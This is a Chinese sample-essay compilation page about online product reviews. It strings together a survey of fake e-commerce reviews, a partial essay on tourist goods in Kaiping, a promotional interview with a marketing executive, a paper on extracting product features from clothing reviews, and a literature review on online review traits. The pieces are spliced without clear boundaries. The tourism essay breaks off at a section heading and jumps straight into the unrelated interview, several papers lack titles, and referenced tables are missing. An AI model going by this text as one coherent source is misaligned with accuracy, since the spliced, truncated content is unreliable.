前言:一篇好文章的诞生,需要你不断地搜集资料、整理思路,本站小编为你收集了丰富的商品评论主题范文,仅供参考,欢迎阅读并收藏。
(1华中师范大学湖北省电子商务研究中心 湖北 武汉 430079
2华中师范大学信息管理学院 湖北 武汉 430079)
摘 要:界定商品虚假评论的概念、称谓和效用度量,总结了虚假评论形成与影响机制,包括虚假评论形成的影响因素以及虚假评论对消费者的影响研究。虚假评论形成和影响机制应结合内部、外部环境,构建全面的理论框架。
关键词 :在线商品;在线评论;垃圾评论;虚假评论
中图分类号:TP391 文献标识码:A doi:10.3969/j.issn.1665-2272.2015.14.016
*基金项目:国家大学生创新性实验计划(A类)基因项目“在线商品评论信息形成机制的实证研究”(项目编号:A2014080)。
收稿日期:2015-04-22
随着B2C电子商务模式的日趋成熟,当在网络上做出购买商品和服务的决策前,消费者已经开始严重依赖于相应的在线商品评论。有效的在线商品评论为市场提供了一个有力的校正机制,并以此帮助和促进市场商品的质量的提升。然而,由于存在利益或名誉上的诱惑,一些组织和个人利用网络信息监管制度的缺失,大量虚假评论从而达到误导消费者和获取自身利益的目的,严重地危害了网络购物环境和秩序。因此对在线商品虚假评论的定义、称谓、效用度量进行界定,综述在线商品虚假评论形成的影响因素及虚假评论对消费者的影响情况,对后续的研究具有重要的借鉴作用。
1 基本概念
1.1 虚假评论的定义
最先提出在线商品虚假评论概念的学者是Jindal教授,他们将虚假评论定义为三种类型:一种是不真实的评论,指故意误导消费者或评论识别系统,目的是蓄意提高或毁坏产品的声誉,具体包括宣传性评论和诽谤性评论;一种是不含观点的评论,指评论中并不包含作者的观点;一种是只与品牌有关的评论,指评论的内容不是直接关于产品的评价而是关于该公司或者供货商。随后Luca等学者基于Jindal的定义又增加了偏离主题的评论这以概念,指评论虽然属于该类型产品的评论,但是和商铺销售的产品无关,如产品是苹果手机,评论却关于三星手机。
1.2 虚假评论的称谓
国外学者从商品垃圾评论属于商品观点中的垃圾观点出发,称其为opinion spam和review spam;从商品垃圾评论固有的欺骗性质出发,称其为fake review;从商品垃圾评论是由人工产生的途径出发,称其manipulative review;从商品虚假评论被用于迷惑其他消费者的用途出发,称其为deceptive review和suspicious review。与此不同的是,国内学者大多从商品虚假评论的欺骗性质出发,直接称其为虚假评论。也有少部分学者沿用国外学者的叫法称为垃圾评论,但这一称谓在国内总体使用度不高。原因是垃圾评论在国内是一个更为广义的概念,包括博客中的垃圾评论、社交网站中的虚假评论、论坛中的虚假评论、在线购物网站中的虚假评论,“虚假评论”则特指在线购物网站中的虚假评论。
1.3 效用度量
对于评论效用的度量,需要考虑评论的可信度和有效性。可信度指信息被信任的程度,强调评论真伪性的辨别,即评论人提供的信息被接受者认可的程度。评论有用性是评论对读者潜在的帮助价值,即评论的效用价值。评论有用性的研究包括有用性影响因素研究和基于效用的推荐排名研究两方面,通过预测评论的效用价值,提取出效用更高的真实评论或依据评论内容对消费者进行个性化推荐。现阶段学者主要以消费者利用他人评论后购买的产品是否满意为标准来判断评论是否有用。如图1所示,在虚假评论识别中通过可信度筛选出一部分虚假评论1,再通过有用性为指标筛选出剩余的虚假评论2,有用的评论则作为辅助消费者正确购买的效用价值高的评论。
2 虚假评论形成与影响机制
2.1 虚假评论形成的影响因素研究
Luca等研究了关于酒店的在线评论,通过分析Yelp虚假评论识别系统认定的虚假评论,发现了三个规律:当酒店的名誉排名靠后时更易实施虚假评论的行为;连锁店不易实施虚假评论行为;当酒店竞争激烈时,更易向竞争企业虚假评论。由此得出商家实施虚假评论行为是出于竞争和名誉的诱因而不仅仅是商家的不道德。孟美任等进一步采用实证分析的研究方式,对淘宝网上18家网店的评论进行为期一年的追踪分析,同时线下调研20个商家,总结出四个方面的动机:推销、诋毁、干扰、无意义。即商家出于增加商铺销量的目的推销评论;同行竞争者出于不良商业竞争诋毁评论;商家关于其他方面的广告宣传及链接属于干扰评论;顾客出于敷衍、奖励机制、单纯发泄情绪而的评论属于无意义评论。因此,如图2所示,笔者将虚假评论的动机总结为三个方面:一是商家出于推销、广告的目的对购买商品的客户虚假评论;二是客户出于敷衍、奖励机制、发泄情绪的目的对商家虚假评论;三是商家之间出于不道德、不良竞争的目的互相虚假评论。另外,非虚假的商品评论应该由购买该商品或服务的客户,我们将其动机总结为:分享欲望、社会互动、产品参与度。
2.2 虚假评论对消费者的影响研究
有些学者从在线评论的不同维度出发研究虚假评论对消费者购买决策产生影响。瓦瑜等通过实证分析的方法,证实了评论者专业性、可信性,评论质量、评论量、评论效价通过产品感知价值对消费者的购买意愿存在正向影响;消费者专业性通过产品感知价值对消费者的购买意愿存在负向影响。郑小平等发现评论内容的质量、评论者信誉度、评论数量会产生促进影响,宁连举等详细为评论情感负面程度、评论内容相关性、评论内容专业性、评论数量会正向影响消费者浏览网站时的感知风险,进而影响其购买意愿。刘丽等具体研究了体验型产品的负面在线评论,补充了评论长度、评论表达方式对消费者感知风险均有显著影响。
有些学者对影响在线评论发挥效力的诸多因素进行了重要程度研究。瓦瑜等发现感知价值对消费者购买意愿存在中介作用,评论质量、评论量、评论效价通过产品感知价值对消费者影响程度最高。刘丽等认为评论内容对感知风险的影响最大,同时证实对于负面在线评论相似性对感知风险的影响有正向显著作用。周晶晶等问卷调查后的排序结果依次是评论的数量、评论者的信誉度、评论内容的质量和评论的效价。总体来看,虚假评论属于商品评论,会通过以上诸多因素作用于消费者的购买决策,但是直接关于虚假评论对消费者购买决策以及商家商品销量的影响的研究仍有待完善。
3 结语
当前关于在线商品评论的形成与影响机制研究缺乏统一的研究框架和通用的概念模型,且现有的研究成果比较零散,绝大部分的研究范围仅局限于特定问题,研究成果缺乏通用性和系统性。
因此,今后对虚假评论形成机制的研究,不仅仅从心理角度出发进行消费者、商家间的动因分析,而且可从虚假评论者形成虚假评论的顺序出发,将形成机制分为三步骤:评论构思阶段、评论写作阶段、评论发表阶段。评论构思阶段级,指用户在脑海中形成评论内容的时期,可研究其他评论信息、用户的心理状态、用户的情感倾向等对用户构思的影响;评论写作阶段,指用户写作评论的过程,可研究用户个人习惯、用户评论动机、用户用语方式等方面;评论发表阶段,指用户点击发表评论,可研究商家的鼓励机制等影响因素。
参考文献
1 Luca M,Zervas G.Fake it till you make it: Reputation, competition, and Yelp review fraud[J]. Harvard Business School NOM Unit Working Paper,2013(6)
2 孟美任,丁晟春.虚假商品评论信息者行为动机分析[J].情报科学,2013(10)
3 瓦瑜,汪蕾.在线评论对消费者购买意愿的影响研究——基于信息传播的视角[D].杭州:浙江大学,2014
4 郑小平.在线评论对网络消费者购买决策影响的实证研究[D].北京:中国人民大学,2008
5 宁连举,孙韩.在线负面评论对网络消费者购买意愿的影响[J].技术经济,2014(3)
旅游商品是旅游者游览活动的延伸与继续,是衡量一个国家和地区旅游业发达程度高低的标志。同时,旅游商品是发展旅游购物的基础,旅游商品的开发创新是旅游购物可持续增长的关键。在一般的旅游过程中,吃、住、行、游、购、娱六项旅游花费前四项是基本固定的、“有限”的花费,而旅游购物则是“无限”花费。旅游购物作为“无限”花费,在旅游产品的构成要素中可挖掘的经济效益的潜力最大,做大做强旅游商品产业对开平本地区旅游经济的进一步发展具有十分重要的现实意义。
(一)提高旅游收入,促进地方经济发展
成功的旅游区开发经验表明,旅游商品的开发生产能够带动当地的经济活力,提高居民的经济收入,以及政府的财政收入。根据近几年的统计数据显示,旅游者在江门市的旅游消费构成中,旅游购物所占比例不足10位数,这反映了购物成为当地旅游六大要素中最薄弱的环节。丰富购物活动,是江门旅游取得进一步发展的关键。
(二)丰富本地产品,调整产品结构
通过调整本地农产品与手工艺品的的产品结构,优化资源整合,引导旅游商品厂家走特色产品之路,进一步拓宽销售渠道。一来可以提供更多的就业机会,再者丰富了开平景区旅游商品的多元化。
(三)提升当地旅游商品文化品位
旅游商品是旅游景区文化的物化和延伸,游客对开平碉楼与村落文化和生态的认可,进而引申为对工艺品、纪念品、土特产品的认可,并通过这种购买行为,达到与开平文化和生态的另一种感悟和交流。地方特色商品兼具地域性、文化性、品牌性,因而有利于以“购”来丰富开平旅游的内涵,从而与世界文化遗产形成旅游购物商品及其购物场所方面的匹配。
二.开平碉楼与村落旅游商品开发存在的主要问题
(一)旅游购物所占比重偏低
在开平碉楼与村落申遗成功的直接刺激下,2007年江门全年接待游客1460.75万人次,比上年增长38.12%。其中城市接待过夜国际旅游者47.95万人次,同比增长37.54%,一日游游客784.14万人次,同比增长73.87%;开平旅游出现了“井喷”效应,主要旅游景点旅游人数激增300%。开平市旅游总收入11.26亿元,增长40.93%①。
中国社会科学院旅游研究中心的魏小安研究员认为,中国的旅游购物市场未来的发展目标应该是世界的平均水平——30%。然而根据开平市旅游局公布的数据,旅游者在开平的旅游消费构成中,旅游购物所占比例却连百分之十都不到。
(二)旅游商品开发还处于粗放阶段
通过实地旅游体验调研,“开平碉楼与村落”这一世界文化遗产地的地方特色商品资源还缺乏全面调查,开发处于粗放状态。具体表现在:
1.旅游商品研发力度不够,产品结构欠合理
开平本地目前大多数旅游商品生产企业规模较小,未能形成规模效益。此外,还存在部分极具本土特色的商品被忽略,在现代工业品大潮中逐渐边缘化,甚至消失,亟待深度挖掘。
2.旅游商品特色不鲜明
作为世界文化遗产,开平碉楼文化内涵丰富、特色鲜明。一些体现历史文化及地域特色的旅游商品,还远远不能满足各类游客的广泛需求,且也无法与世界文化遗产的身份匹配。特色明显、文化含量高的商品所占比重还很小,缺乏拳头产品。
3.质量意识不强,包装层次低
本地区仅有的数家旅游商品生产企业尚处于作坊式生产经营状态,由于其在资金、人力、技术等方面的限制,使得部分旅游商品做工粗糙,档次较低。偷工减料、以次充好、以假乱真的现象也较普遍,严重挫伤旅游者的购买积极性。
此外,许多景点购物环境混乱,产品单一, “回扣”现象普遍存在,售后服务不完善。
(三)政府对开平碉楼与村落旅游商品的开发工作收效甚微
伴随“申遗”工作,江门市政府和市旅游局一直非常重视开平碉楼与村落景区的建设和发展,并通过举办评选优秀旅游商品相关活动支持当地旅游特色商品的发展,但是旅游商品消费在开平的旅游收入占的比例仍旧很低,举办的有关活动产生的实际效果并不显著,导致劳民伤财且收效甚微。
三.开平碉楼与村落旅游商品的资源优势与特点
(一)开平碉楼与村落旅游商品开发的优势与特点
开平碉楼与村落深厚的文化影响优势主要是源自其驰名中外的中西方结合的侨乡文化、独特而且具有地方文化特征的建筑艺术。同时,开平碉楼与村落景区地处广东中南部、珠江三角洲西缘,属南亚热带地区。受海洋气候影响,潮湿多雨,年降雨量在1700至2400毫米之间,属于丘陵地带,但东部和中部部分地区为潭江冲积平原。有着独到的气候优势,决定了本地区具备丰富的物产资源。
(二)开平碉楼与村落旅游商品的谱系
经过多次的走访调查,得出开平本地现有的和潜在的大致旅游商品谱系如下
绿色食品类:潭碧冬瓜、开平广合腐乳、外海面、金山火蒜、水口白菜、陂头桂味荔枝、农家肥蔬菜、台山虾酱、古劳豆豉、联竹果蔗、金鸡番葛、龙胜甜橘、马冈鹅
中草药保健类:锦云单枞茶、东山蜂蜜、新会陈皮、鹤山桔普茶、荷塘头菜、开平芦荟、健之源灵芝补品、乡土味响山簕菜茶、开平陈皮茶、开平陈皮梅
旅游纪念品类:碉楼微缩模型、碉楼积木、碉楼纸牌游戏、传统工艺品如碉楼茶砖、皮雕系列工艺品、轻工小纪念品、有纪念意义的文化衫及丝绸、纺织品(如LG服饰、牛仔服装)
旅游文化类:明信片、画册、邮册、开平名人相片集、开平名人书法艺术集、开平名人绘画艺术集、碉楼故事集
宗教类:佛教、道教、基督教、伊斯兰教
旅游用品类:旅游箱包、首饰盒、生活用品、医疗保健用品
旅游书刊类:导游图、导游手册、美食路线图、地方杂志
四.开平碉楼与村落旅游商品开发对策
在前不久CCTV发现之旅频道的《华商论见》栏目的拍摄现场,我们看到了常州爱尔威智能科技有限公司的营销副总何春华。整个录制过程中,何春华就如何认知品牌价值和树立品牌等话题侃侃而谈,给现场的其他企业家及记者都留下了深刻的印象。
(左二:何春华)
“虽然哥不在江湖,但江湖还有哥的传说”
提起何春华,可能很多人并不熟悉。但对于台湾旺旺集团的人来说,这个名字在整个集团内部以及快消品行业中是有着响当当的地位的。何春华在九十年代就加入了旺旺集团,开始了长达20年的快消品市场营销管理工作。他曾经提出的一些营销理念和渠道建设模式至今也都还在被众多的后来人学习与效仿。离开旺旺集团后,他进入香港海德实业有限公司,开始负责公司的项目设计与全国的项目布局等工作。在谈到这两段工作经历的时候,我们听到的最多的关键词就是“速度”与“深度”。这不仅让我们产生了一个问题,那就是为什么会从相对比较成熟的传统行业一步跨入到智能硬件设备这个目前还相对小众的领域呢?
针对这一问题,何春华是如此回答的:“其实对于营销人员来说做什么行业不重要。产品只是企业文化和销售理念的载体。每一个营销人员的希望都是能在一个好的平台上,实现属于自己的理念与价值。那么,从“衣食住行”这些跟民生息息相关的行业看,我以前大部分时间是在做跟“食”这个方面有关的事情。对于现阶段的国人来说,在已经解决了“食”这个问题的当前,大多数人开始对“行”这一块提出了更多的需求。从发展的角度看,这就是一个大平台。
选择爱尔威公司,是一种机缘巧合,也是一种必然。爱尔威是一家专业研发、生产智能交通工具的企业,并且这家企业非常强调技术的高效转换与市场的快速渗透。这和我做事情所追求的“快速”是不谋而合的,所以这是一种缘分。虽然目前智能硬件设备的确属于比较小众的市场,但几乎所有人都认识到了智能化时代的趋势。所以,从市场角度看,今天的“小”恰恰印证了明天的“大”。而这正是必然!“
“天下武功,唯快不破”
“互联网思维”的诞生,给很多传统行业都带去了冲击、颠覆甚至毁灭,对此相信很多人都深以为然。新兴的互联网行业正以强劲的势头挤压着传统行业的生存空间,对于这一点,何春华用道家的理论做出了独特的解读。
“世间万物最终都会归于平衡,这是一种规律,就是我们常说的‘道’。现在的互联网思维与经济之所以被人们推崇,最主要的原因是顺应了时代的潮流,符合了消费者的需求。而传统行业在应变上慢了,导致了这样一种此消彼长的局面。但是从越来越多的线上企业和线下企业加强相互之间的互动和异业合作可以看出,谁把谁颠覆掉都是个伪命题,正确的理解应该是‘借鉴与融合’,最终还是一个词:归于平衡,产生一种新的商业模式。
在当今这个互联网+的时代,一个显著的特点就是‘以快制快,以快打快’。不管是哪一类企业都应该对市场的变化做出快速反应。在出行交通工具这个行业,我接触过很多传统实体经销商,他们正面临着本行业市场饱和、利润瓶颈、品牌寡头等问题的困扰,面对互联网运营与智能时代的来临,他们充满了疑惑和焦虑。
对于这些仍停留在传统模式中的人,如何让他们快速拥抱互联网,并且快速获得过硬的智能硬件技术支持,从而成功转型,这就是爱尔威想要去实现的。利用我们的专业和对渠道的感同身受,去引导传统经销商们做出正确的决策,让他们能更全面的去认识智能交通产业的发展预期,在市场井喷期到来之前找准自己的位置,做好卡位的工作。
所以,我们将以爱尔威自身对传统行业与新兴行业的跨界优势、渠道建设的经验、以及实际的辅销行为等,来协助我们的渠道客户打好这场行业的转型战役。”
关键词:产品评论;产品特征;特征提取;评论挖掘
中图分类号:TP311 文献标识码:A 文章编号:1009-3044(2016)14-0159-03
A Product Feature Extraction Method Based on Customer Comments
TU Shun-lin, LIU Li, LI Wei-hua, ZHAO Yi-xia
(Department of Computer Science, Huizhou University, Huizhou 516007, China)
Abstract:The paper combine with the characteristics of Chinese proposed an approach to obtain product features set.Part-of-speech tagging and statistics are used to get the candidate product features set,then use pattern matching to tailors the candidate product features set and filtered it according to the stop words library.Finally the product features set are obtained. The proposed method was tested with the real clothing reviews which were obtained by scrawler technology from Internet and the results show that the validity of the method is proved preliminarily.
Key words: product reviews;product features ; features extracting;review mining
1 概述
电商的蓬勃发展与规模的迅速壮大,越来越多的人选择网购的同时也导致越来越多产品评论的积累。Web上的评论信息是海量的无结构化数据,企业和客户想要从产品中获得信息只有通过人工阅读的方式进行,而这是一个消耗时间而且容易产生错误的过程[1]。如此处理并没有很好地利用这些数据,既不能及时有效地反馈客户对商品的态度,更难以为企业高层的决策提供辅助,由此“评论挖掘”应运而生。评论挖掘作为非结构化信息挖掘的一个新兴领域,主要涉及网络评论中的情感分析、产品特征提取以及主观内容识别等[2]。与国外比,汉语评论挖掘方法和技术的研究起步较晚,而文化的差异、语言表达方式、词汇语法等差异也注定很多国外的研究成果无法直接应用到中文评论处理上。因此,结合相关文献与研究,本文提出一种简单自动提取出客户评论中的产品特征的方法,实验证明该方法行之有效,可为企业建立评论挖掘系统提供参考。
2 客户评论中的产品特征
产品特征指的是客户、企业、厂方等对产品本身、产品部件、部件的性能或功能上的抽象概括。一般来说,生产商对于产品都会提供一份描述产品各方面功能和性能的说明文件。对于服装产品来说,这份说明除了包括品牌、风格、上市年份、材质等服装的基本属性外,还包括更多的技术细节,但是这些细节客户往往都不太感兴趣。此外,客户评论中对于产品特征的描述是一个开放性的问题,客户可能在产品评论中发表一些企业或厂商根本就没注意到的一些产品特征,而这些特征正影响着广大消费者的购买决策。正因如此,需要从产品评论中提取客户评论中的产品特征[3]。
产品的特征分为显式特征和隐式特征两种[4]。显式特征是直接出现在产品评论中描述产品的性能或功能的名词或名词短语。比如说“好喜欢,尺码挺准,挺合身的”,这里尺码是显式特征。而隐式特征就需要对句子的语义进行理解才能提取出来,并没有在语句中有直接的描述。如“从广州到佛山给我送了5天我就呵呵了”,其实这里指出了产品物流的这个隐式特征。抽取隐式特征需要自然语言的分析和理解技术,但是目前该技术尚不成熟,所以这里所说的产品特征提取是指显式特征的提取。
3 产品显式特征的提取
3.1 人工定义和自动提取
显式产品特征的提取分人工定义和自动提取两类方法。
采用人工定义的方法就是从某特定领域的产品评论库中以人工的方式抽取出产品特征。当产品类型不同或者产品发生改变时,都需要重新构建产品特征集合。这种方法的可移植性、自适应性都比较差,查全率较低。
采用自动提取的方法主要依靠词性标注、句法分析等方法配合其他的提取技术实现。比如利用NLP分词及词性标注技术对客户评论进行解析,从中提取名词或名词短语来作为候选特征词。此方法的优点是处理速度快,但是只依赖词性的提取精确度不高。另外有学者提出基于关联规则挖掘频繁项集并用支持度进行裁剪的方法提取特征词,使用这种方法能提取到高频特征词但对低频特征词提取效果不好[5]。文献[6]提出一种利用互信息(PMI)的特征提取方法。该方法首先提取出频率高于某一阈值的名词或名词短语来作为候选特征词,然后利用搜索引擎计算出候选特征词与产品的互信息,依此确定特征词与该产品的相关性。但是由于是基于搜索引擎的方法,所以在处理的速度上会比其他方法慢许多。
3.2 产品特征提取方法
本文依据中文特点融合多种产品特征提取方法,提出一种简单有效的产品特征提取方法。该方法通过词性标注和统计抽取产品特征候选集,再利用模式匹配对产品特征候选集进行裁剪,最后构建无关词库对产品特征候选集进行过滤,得到产品特征。提取过程如图1所示。
该方法的具体步骤如下:
(1)利用爬虫程序下载服装商品评论。
本文实验数据采用某品牌天猫服装的评论信息,因此需要设计出合适的爬虫程序。网络爬虫是一种自动提取网页的程序,提取的数据是半结构化的HTML结构。
(2)过滤无价值的评论信息并形成商品评论库。
爬虫下载的源文档HTML结构中包含大量的与商品评论无关的内容。如HTML文档的头部和尾部信息、外部资源的链接、客户端脚本程序的定义、文档样式定义等内容,这些内容均属于无价值的内容。另外,由于客户对商品的评论是开放性的,有部分客户会借此做出恶意的推广或误导评论。包含各种联系方式(电话号码、QQ号等)和外部链接的评论基本都属于无价值的恶意评论。
(3)利用中文分词和词性标注工具处理评论库。
通过过滤处理的评论数据组成评论库,评论以句为单位通过分词工具的处理,同时统计计算出词语或短语出现的频率。定义候选词库的数据结构为{A,B,C,D},其中A为词语或短语,B为词性,C为出现频数,D为该词在该句评论中的出现语法模式。如:评论“感觉衣服尺码偏大”,若“尺码”在库中出现10次,则提取结果为{"尺码","/n",10,"/n/n/尺码/a/a"},最后形成由词语和词性标注的有序排列。
(4)抽取候选特征词。
由于产品特征值主要由名词或者名词短语组成,所以本文关注词性标注为名词或名词短语的分词结果并将其抽取为候选特征词集合。每一款服装商品的所有评论都形成各自的候选特征词集。
(5)通过半自动的方法建立停用词库。
为了节省空间、提高提取效率和准确率,需要过滤某些词,这些词称为“停用词”。这些词往往出现频率较高,但却不是产品特征,有的甚至没有什么含义。例如:“给表妹买的,很合身”这样的句式在评论中是很常见的。其中“表妹”一类的人称代词出现的频率较高,而一般的基于概率统计思想的算法往往会将其认为是“高频特征”而错误提取。因此,使用停用词库进行过滤就能较好地解决这一类问题。首先获取其他类型商品的评论信息,按上述方法抽取出这些商品的特征词,最后取这些特征词的交集构建停用词库。但是因为有的特征词如上市时间,物流,外观等属于通用特征词所以需人工挑选出来。
(6)裁剪候选特征词。
通过统计和模式匹配对候选特征词进行裁剪。利用统计的方法选取高频特征词,并在这些已经选取的高频特征词中前后寻找语法模式。然后调整统计的阈值并用语法模式的匹配裁剪以提取低频的特征词。最后通过停用词库过滤得出最终的产品特征词集。
4 数据实验
4.1 特征词集合
由高频特征词以及符合匹配模式的名词组成,最后通过无关词库的过滤的出特征词集合。采用某品牌天猫店中的1132款服装的商品信息和对应的17039条有效评论通过本文方法获取商品特征如下:
其征词旁的标号为该词在评论语句中出现的频数,没有标号的词通过匹配模式提取。
4.2 验证与评价
对产品特征提取方法的性能判断,可用查全率和查准率进行评价。产品属性的提取相当于对属性词语的二维分类,即真实属性还是非真实属性、已提取属性和未提取属性的分类。采用列联表(表2)说明如下:
查全率(R)=A/(A+B);
查准率(P)=A/(A+C);
利用人工识别的方法,可做查全率和查准率的计算,并说明上述方法的准确性[7]。以一款男装和一款女装为例,统计结果如下:
某款夏季男装(id:3953xxx0863)
相对于其他产品特征挖掘方法,本文所提出的方法与其他方法的结果比较如表5所示。以上述两款服装为例,算得查全率和查准率的平均值分别为66.19和85.25。
通过比较,表明本文方法对于商品评论中的特征提取有着较高的查准率,但是明显的查全率偏低,基本保持在66%左右。这主要是由于低频特征词的获取是由匹配模式决定的,个别的产品特征出现频数较少以及网络评论句式的自由化、多样化都给匹配模式的准确构建提出了更高的要求。随着匹配模式的进一步研究与改进,相信将会取得更好的效果,同时这也是本文今后的研究方向。总之,从实验结果来看基于词性标注和统计并利用模式匹配对候选特征词进行裁剪的产品特征提取方法还是比较有效的。
5 总结
产品特征不仅是影响客户做出商品购买决策的重要因素,也是企业为提高产品和服务质量、提高收益的关键。而产品特征提取是产品评论挖掘的重要方面,更直接影响到评论挖掘系统的性能。本文提出的方法能够有效地从商品评论库中提取出商品特征值,并以真实评论数据为实验,表明了该方法的有效性,可为企业构建评论挖掘系统作参考。
参考文献:
[1] 伍星,何中市,黄永文.产品评论挖掘研究综述[J].计算机工程与应用,2008,4(36):37-40.
[2] 李实,叶强,李一军,罗嗣卿.挖掘中文网络客户评论的产品特征及情感倾向[J].计算机应用研究,2010,27(8):3016-3019
[3] 郗亚辉, 张明, 袁方,等. 产品评论挖掘研究综述[J]. 山东大学学报:理学版, 2011, 46(5):16-23.
[4] 王永, 张勤, 杨晓洁. 中文网络评论中产品特征提取方法研究[J]. 现代图书情报技术, 2013(12):70-73.
[5] 李培. 产品评论挖掘的观点抽取和分类技术研究[D]. 重庆大学, 2009.
关键词:在线产品评论;文本评论;文本挖掘技术
基金项目:教育部人文社会科学研究青年基金项目:“网页中产品属性文本信息对消费者购买决策的影响机制研究”(编号:14YJC630204)
中图分类号:F724.6 文献标识码:A
收录日期:2015年5月31日
网络购物用户在网上购物时很多人都会浏览参考其他人对商品的评论信息,并且在购物后进行在线评论。2006年开始对在线产品评论的研究不断增多(李恒,2015)。由于该研究主题涉及信息系统、电子商务、消费者行为、图书与情报科学等多个不同领域的交叉,相关研究文献较难得到系统性的整理。本文拟从在线评论的特征、作用、分析技术这三个方面对这些文献进行梳理。值得注意的是,由于文献涉及范围过于广泛,为了使本文综述主题聚焦,文中关于在线评论的文献仅局限于商家购物网站的购买者评论,也称为在线产品评论。其他在线评论或者在线口碑形式不在讨论之列,比如第三方平台的评论(影评、试乘试驾评论、点评网站评论等)、社交媒体中的产品或企业评论(各类口碑、舆情、内容营销及互动等)。
一、在线产品评论特征
李恒(2015)把消费者的在线评论特征总结为分属于评论星级和文本评论两种形式下的12种维度。其中,评论星级指的是购买者对该次购物的总体评价。这种形式中没有分出更多的维度,因此评论星级就是一个维度。在文本评论这一形式中,有评论标题、评论内容一般特性、评论内容的语义特征、评论内容的时间特性这四类。在这四类中分别包含了评论标题、评论质量、评论数量、评论长度、评论差异性、评论效价、评论类型、评论可读性、评论强度、评论及时性、评论时效性等11个维度。这12个维度具体的隶属关系以及其研究焦点属性本文将其整理至表1中。接下来本文针对表1中的各种在线评论特征维度和其研究焦点属性逐一进行解释。(表1)
评论星级指的是购买者对该次购物的总体评价。这种形式中没有分出更多的维度,因此评论星级就是一个维度。通常的研究焦点在于评论星级的极端性与中立性的作用。以大部分购物网站采用的五星评分制度为例,评论星级的极端性即一星为代表的极端负面评价与五星为代表的极端正面评价,而三星反映中立态度。
接下来的文本评论中包含了网购用户有文字留言内容的评论中的各种特性的研究维度。大略可以分为文本评论标题和文本评论内容两类,文本评论标题是评论者对评论内容的文本概括,在除了在线产品评论以外的在线评论中比较常见。通过评论者自拟的标题使浏览者容易从标题的关键词以及总体情感倾向中搜索以及快速知晓评论整体内容,但是在购物网站的用户评论中设置标题的并不多,比如国内的淘宝、京东等购物网站的用户评论中均没有设置文本评论的标题。因此,本文中不再赘述。文本评论内容就是网购用户用文字留下的购买感受的评价内容,李恒(2015)将其特性分为一般特性、语义特征和时间特性三类。本文在介绍完表1这些特征之后,再对其中未包含的一些特征进行补充。
评论内容的一般特性包括评论的质量、数量、长度和差异性。其中,数量和长度比较好理解,就是该产品下购买者的累计评论的总数和评论的文字字数长度,其研究属性也是总数和字数长度的计量值。评论质量特性借鉴了霍夫兰德的说服模型中信息内容对说服效果的影响作用,强调了在线产品评论作为消费者用来参考购买的有用信息,信息的浏览者对于产品评论信息的真实性、可靠性、内容与其所评价的产品的相关性以及是否为后续购买者提供了大量有用的信息这几个方面的主观感知(郭国庆,2010;李宏,2011)。其研究属性也基本围绕这几个有关信息质量评价的主观因子展开。评论差异性,即评论离散度,能显示不同评论中购买者态度或观点上的分歧程度。其研究属性通常采用评论者对网络平台设置的评分项打分的方差或标准差来度量。
评论内容的语义特征包括评论的效价、类型、可读性和强度,这些特性都与文字评论的文本内容的表达有关。简单来说,效价代表了文本内容的词语描述中总体体现出来的情感倾向,其研究属性有正面、负面和中立(或综合)之分;类型代表了文本词语中对产品属性及其体验的描述是客观还是主观之分;可读性代表了评论文本词语中每个评论者其自身带有的语言习惯表达、拼写、词汇选择、句长句式语法等是否容易让浏览阅读的人理解,因此其研究属性也是浏览评论者的一种主观性的感知(Korfiati,2012);强度代表了评论文本词语措辞中表现出的情感态度的强烈程度,其研究属性主要集中于浏览者对负面口碑中负面情绪强度的感知程度(黎小林,2007)。
评论内容的时间特性包括及时性和时效性,这两条特性与评论的时间信息有关。评论及时性代表评论时间与购买时间的间隔远近,研究属性是评论发表的天数,但是究竟天数长好还是短更好可能并不是简单的线性关系,因此到底是否及时的判断也就比较模糊了;而时效性代表评论时间与现在(浏览时间)间隔远近,以及是否在最近有频率较高的密集评论,这反映了该产品的近期火热与流行程度,研究属性是评论浏览者对时效性强与弱的主观评价(刘逶迤、逯万辉,2010;郭国庆等,2010;龚思兰等,2013)。
其他表1中未提及的较为重要的特性还有评论者特征等等。评论者的特征包括评论者是否匿名(身份知否披露)、评论者的专业性、评论者的声誉、排名等等(Racherla P,Friske W,2012;Hyunmi et al.2012)。这个部分我们只是将这些现有研究中涵盖的特征进行了简单归类和罗列,其中有些特征在技术、功能和研究范式发展过程中会出现不同程度的交叉重叠和所属类别上的变化,在后文中会有所提及。
二、在线产品评论作用
以上谈到的是在线产品评论的特征,对于在线产品评论的功能研究者们也有所探讨。在线评论的功能一方面包含有大量产品属性、使用价值方面的描述信息可以给潜在购买者信息上的借鉴,帮助他们降低不确定性风险;另一方面评论中含有大量购买的情感体验和表达信息,对商品有强大的推荐作用,大量比较集中的正面或者负面评论会引起潜在购买者的从众行为,影响他们购买或者不购买的最终决定。遵从这些意见购买产品(Park DH,et al.2007;Duan W J,et al.2008)。关于评论功能的衡量焦点主要集中在评论信息质量(评论有用性),评论可信度和消费者态度形成与改变以及具体的销量数据等。
Mudambi和Schuff(2010)从信息经济学中信息的诊断性角度定义了评论信息质量。早期的评论信息质量的评价并不局限于文本评论,但随着研究者对评论内容特征的关注,评论质量越来越多用来反映文本评论内容对浏览者的信息参考价值。正如上文中提到对于文本评论而言评论质量包含真实性、可靠性、相关性、有用性四个方面。借鉴技术接受模型TAM中人们接收新技术会受到对新技术感知有用性的影响这一思路,评论质量中关于评论有用性的评价指标更加受到重视,并成为判断评价信息功能的主要研究变量。早期的评论有用性研究将评论星级及评论长度作为评论有用性的衡量指标,其好处是指标简单,易量化。后期产品评论研究的重点转向文本内容认知,对于文本内容有用性的划分采用了评论长度和可读性两个维度来衡量,有的研究中也将评论有用性定义为评论感知价值(Schindler&Bickart,2012)。由于当前对文本内容分析的方法是基于文本语义属性的挖掘方法,对于在线产品评论相关特征的数据采集和统计大都是通过网络信息搜索软件实现,因此目前评论有用性的衡量通常是用网站中评论有用性的排名数据统计来替代。但是并不是所有购物网站的评论系统中都会设置评论是否有用这一浏览者打分机制,并且受到文化的影响,即便网站设置了这一功能,国内的消费者也没有去给评论打分的习惯。因此这种衡量方式的有效性也一直受到争议。
